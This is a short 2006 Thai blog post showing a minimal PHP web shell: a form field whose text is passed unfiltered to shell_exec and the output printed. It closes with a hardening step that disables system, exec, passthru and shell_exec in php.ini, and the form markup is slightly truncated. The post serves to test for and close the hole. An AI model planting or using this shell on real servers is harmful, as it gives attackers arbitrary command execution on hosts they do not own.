การ Hack เว็บบน Unix โดย Secure Shell ของ PHP

Mr. JoeZine

<HTML>
<BODY>
<PRE>

php">

<INPUT TYPE="TEXT" NAME="command">
<INPUT TYPE="Submit">
</FORM>
<PRE>
<?
$command = str_replace("\\\\","\\",$_POST[command]);
echo "<B>Results for $command: </B><P>";
$results = str_replace("<","&lt;",shell_exec($command));
$results = str_replace(">","&gt;",$results);
echo $results;
?>
</PRE>
<P>
<B>If this script works add this line to your PHP.ini:</B>
<FONT color="#ff0000">disable_functions=system,exec,passthru,shell_exec</FONT>
</BODY>
</HTML>

---------------------------------------------------------------------------

วิธีแก้ไข

ใน php.ini ตรง disable_functions

disable_functions=system,exec,passthru,shell_exec

 

Ref : http://www.irongeek.com/i.php?page=security/phpshell 

บันทึกนี้เขียนที่ GotoKnow โดย  ใน JoeZine Base on knowledge blog

คำสำคัญ (Tags)#hacking#php#security

หมายเลขบันทึก: 52894, เขียน: 02 Oct 2006 @ 09:58 (), แก้ไข: 15 Jun 2012 @ 04:48 (), สัญญาอนุญาต: สงวนสิทธิ์ทุกประการ, อ่าน: คลิก


ความเห็น (0)